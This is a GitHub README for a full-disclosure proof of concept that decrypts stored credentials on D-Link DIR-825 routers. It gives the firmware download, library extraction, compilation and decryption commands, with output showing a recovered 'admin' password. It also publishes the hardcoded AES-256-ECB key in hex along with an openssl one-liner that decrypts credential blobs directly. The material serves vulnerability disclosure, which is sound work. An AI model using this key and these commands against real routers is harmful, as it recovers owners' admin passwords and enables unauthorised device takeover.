Skip to content

full-disclosure/FDEU-CVE-2021-525A

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

FDEU-CVE-2021-525A

D-Link credentials decryption tool poc

Prerequisites

  1. Download OpenWRT binary toolchain:
wget http://archive.openwrt.org/chaos_calmer/15.05.1/malta/be/OpenWrt-SDK-15.05.1-malta-be_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64.tar.bz2 -O openwrt.tar.bz2
  1. Extract the toolchain:
tar xvf openwrt.tar.bz2
mv OpenWrt-SDK-15.05.1-malta-be_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64 openwrt
  1. Download D-Link firmware:
wget https://ftp.dlink.ru/pub/Router/DIR-825_AC_E1A/Firmware/2019.09.11-17.44_DIR_825AC_G1A_3.0.6_release.bin -O firmware.bin
  1. Install binwalk:
sudo apt-get install binwalk
  1. Extract the firmware:
binwalk -e firmware.bin
  1. Pull D-Link decryption libraries:
cp _firmware.bin.extracted/libaes-gpl.so .
cp _firmware.bin.extracted/libdhal.so .
cp _firmware.bin.extracted/libmd5-rfc.so .
cp _firmware.bin.extracted/libmtd.so .
cp _firmware.bin.extracted/liblogger.so.2.0.2 liblogger.so.2.0
cp _firmware.bin.extracted/libjansson_tools.so .
cp _firmware.bin.extracted/libmnl.so.0.1.0 libmnl.so.0
cp _firmware.bin.extracted/libhwdata.so .
cp _firmware.bin.extracted/libnvram.so .
cp _firmware.bin.extracted/librlx_wifi_mibs.so .
cp _firmware.bin.extracted/libjansson.so.4.9.0 libjansson.so.4

  1. Install qemu-user-static:
sudo apt-get install qemu-user-static

Compile

Run the provided compilation script:

./compile.sh
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
./libdhal.so: warning: gethostbyaddr is obsolescent, use getaddrinfo() instead.
./libdhal.so: warning: gethostbyname is obsolescent, use getnameinfo() instead.

Decrypt

./decrypt.sh 96f6e6cab3c87a5c5c419aa7208711f6
./decrypt: cache '/etc/ld.so.cache' is corrupt
Decrypted: admin

Encryption algorithm

UPDATE 2021-11-17

Thanks to an anonymous github user that has reverse engineered the encryption algo and sent us the key:

  • Algo: AES ECB
  • Key length: 256
  • Key in hex: 47456e20521d432100090065250000524c2f000020004d000765001f00096b02

Example:

echo -n  92f000a7fdc6857fddfb67912ae1f15800000000000000000000000000000000 | \
xxd -r -p | \
openssl enc -d -aes-256-ecb -K 47456e20521d432100090065250000524c2f000020004d000765001f00096b02